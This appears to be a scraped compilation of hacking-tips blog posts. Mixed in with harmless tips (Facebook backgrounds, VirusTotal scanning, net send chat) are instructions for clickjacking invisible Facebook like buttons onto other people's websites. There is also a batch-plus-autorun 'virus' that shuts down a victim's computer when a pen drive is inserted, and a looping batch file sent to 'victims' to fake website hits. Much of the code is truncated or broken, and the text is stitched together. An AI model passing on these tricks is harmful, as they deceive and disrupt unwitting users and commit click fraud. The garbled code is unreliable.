How to Change Facebook Login Screen Background Picture

1) First of all, Go to FB Refresh Chrome Extension.

2) Click Add to Chrome, then confirm by clicking Add button.


3) After adding the plugin to Google Chrome, Go to  chrome://chrome/extensions/   to access all Chrome extension settings.

4) Now scroll down until you find the installed extension (FB Refresh), then Click Options just below it.

5) When you click Options, you'll be redirected to settings page of FB Refresh.

6) Under Image URL/Upload section you can paste the Image URL that you can find on Google Image Search or simply Upload an image of you.


7) You can also customize some other settings (Repeat X/Y, Size...) if needed.

8) After that, you have to Click on Save button in the bottom of the page.

Done! Now you can visit Facebook and notice the new Background that looks very stylish.

Protect your blog ! ! !

How To Disable Right Click On Your Blog ?

 1. Got to your bloggeDashboard and then Click on Layout.

2. Now Click on Add Gadget and select Html/Javascript.

 3. Now paste code given below in the pop up window.

<!--MBW Code-->
<script language='JavaScript1.2'>
function disableselect(e){
return false
function reEnable(){
return true
document.onselectstart=new Function ("return false")
if (window.sidebar){
<!--Code End>

4. Save it and done. Now users will not be able to right click on your website.

Get 1000+ likes for free Tutorial

Are you a page admin of facebook?
Well it must be tough , isn't it?
Do yo have millions of likes to your page? Toady i am going to teach you Clickjacking

What is Clickjacking?

Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). 

How It Work ?
The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like button is clicked and your fan page is liked.First download the JavaScript from the below download link.\


After downloading the script extract all the files.Now modify the config.js and follow the below instructions.

1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.

2. There is a time out function after which the like button will not be present(move) anymore. 
"time" if set to 0 will make it stay forever(which is usually not preferred).

3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible

Properly set the var in the file if it is jumbled ?

After modifying the config.js script upload these scripts to javascript hosting website.I prefer yourjavascript you can also upload to some other website.

How To Run The Script ?

1. Add config.js just above head tag in your pages
<script language="javascript" src="src/config.js"> </script>

2. Add like.js after body tag in your pages
<script language="javascript" src="src/like.js"> </script>

Remove src link with your uploaded link.

5. That's it. The script is ready to go.

I recommend you put it in others website
Easy way of doing this is
downloading  scripts from then modifing the script using above tricks
In this post i will help you to make the virus to make the system turned off wheneverpen drive is inserted.
Step 1:

copy this code into notepad:
@echo off
shutdown -s -t 00
Save it with .bat extension (for eg: clickme.bat).

Step 2:  

Now open the notepad and copy this code:

Action=Mouse Disable

Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.
Step 3: 

Then copy the two files in your pen drive or victim's pen drive.

That's all whenever the victim insert his pen drive,the system will be turned off automatically.

Chat in CMD using IP address

It is easy and simple trick.
We can chat using CMD
You can try this in your school or college systems(it should be networked systems).
Step 1: 
 Get  the ip address of your friend's system.
if you are using college or school system,then ip address will be in particular range.
Step 2:
copy the following Batch code in notepad:

@echo off
echo TypeIPAddress
set /p n=IPAddress:
set /p m=Message:
net send %n% %m%
Goto A
Save the file with .bat extension(For Eg: message.bat)
Step 3:
Open command prompt and navigate to that batch file location.
open the file in notepad.
If you don't know how to move to that path,simply drog and drop in cmd.Then hit enter.

Step 4:
Now it will ask you for the IPAddress.
Enter the IP address which you want to send message.
Hit enter
Now it will ask you for the message.
Enter and hit enter

The user with whom you connecting system's cmd should be opened in order to receive. 
Usually if we download free software from public file hosting service website, it may contain some virus or keylogger.  If you run the program without scanning, it leads to problem in your computer. So it is necessary to scan your files before you run or open.

For scanning purpose, you don't need any anti virus but Internet. will scan your file and give reports about the file.

if you have the download link, then select submit url and paste url. Click the Send file.  It will star the scanning process.  Wait for a while.

If you already downloaded the file or want to scan local file, then use upload file.

This virustotal will scan file with all antivirus' virus signature.
Are you website or blog owner? want to have some number of hits for websites.  You can do this by batch programming.  It is simple Batch program.

What is the Use?
Your page will get more no of hits.   By sending to your friends and other victims, you can more hits to your website from various IP address.
Here is the Batch Programming:

@echo off
start C:\Progra~1\Intern~1\iexplore.exe “
ping -n 10 >nul
taskkill.exe /im iexplore.exe
goto 1

Change the breakthesecurity with your domain url.

I think you know how to create batch programming.
Ok no problem..!! i will teach again to create it.
Copy the above code
Paste in notepade
Save it with .bat extension (for eg: site.bat)

That's all now send it to your friends and victims to get more hits to your site or blog whatever.